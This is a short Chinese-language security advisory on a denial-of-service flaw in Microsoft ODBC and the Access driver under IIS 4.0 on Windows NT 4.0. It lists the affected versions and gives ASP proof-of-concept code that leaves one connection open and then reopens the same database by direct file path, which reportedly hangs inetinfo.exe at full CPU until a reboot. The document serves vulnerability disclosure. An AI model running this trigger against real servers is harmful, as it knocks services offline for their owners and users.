18、MS ODBC數據庫連接溢出導致NT/9x拒絕服務攻擊

漏 洞 描 述:
Microsoft ODBC數據庫在連接和斷開時可能存在潛在的溢出問題(Microsoft ACCESS數據庫相關)。
如果不取消連接而直接和第二個數據庫相連接，可能導致服務停止。

影響系統:
ODBC 版本: 3.510.3711.0
ODBC Access驅動版本: 3.51.1029.00
OS 版本: Windows NT 4.0 Service Pack 5, IIS 4.0 (i386)
Microsoft Office 97 Professional (MSO97.dll: 8.0.0.3507)

漏洞檢測方法如下:
ODBC 連接源名稱: miscdb
ODBC 數據庫型號: MS Access
ODBC 假設路徑: d:\data\misc.mdb

ASP代碼如下:

<%
set connVB = server.createobject("ADODB.Connection")
connVB.open "DRIVER={Microsoft Access Driver (*.mdb)}; DSN=miscdb"

%>

<html>
<body>
...lots of html removed...
<!-- We Connect to DB1 -->
<%
set connGlobal = server.createobject("ADODB.Connection")
connGlobal.Open "DSN=miscdb;User=sa"
mSQL = "arb SQL Statement"
set rsGlobal = connGlobal.execute(mSQL)
While not rsGlobal.eof
Response.Write rsGlobal("resultfrommiscdb")
rsGlobal.movenext
wend
'rsGlobal.close
'set rsGlobal = nothing
'connGlobal.close
'set connGlobal = nothing
' Note we do NOT close the connection
%>

<!-- Call the same database by means of DBQ direct file access -->
<%
set connGlobal = server.createobject("ADODB.Connection")
connGlobal.Open "DRIVER={Microsoft Access Driver (*.mdb)};
DBQ=d:\data\misc.mdb"
mSQL = "arb SQL Statement"
set rsGlobal = connGlobal.execute(mSQL)

While not rsGlobal.eof
Response.Write rsGlobal("resultfrommiscdb")
rsGlobal.movenext
wend
rsGlobal.close
set rsGlobal = nothing
connGlobal.close
set connGlobal = nothing
' Note we DO close the connection
%>

在這種情況下，IIS處理進程將會停頓，CPU使用率由于inetinfo.exe進程將達到100%。只有重新啟動計算機才能恢復。
（出處：熱點網絡）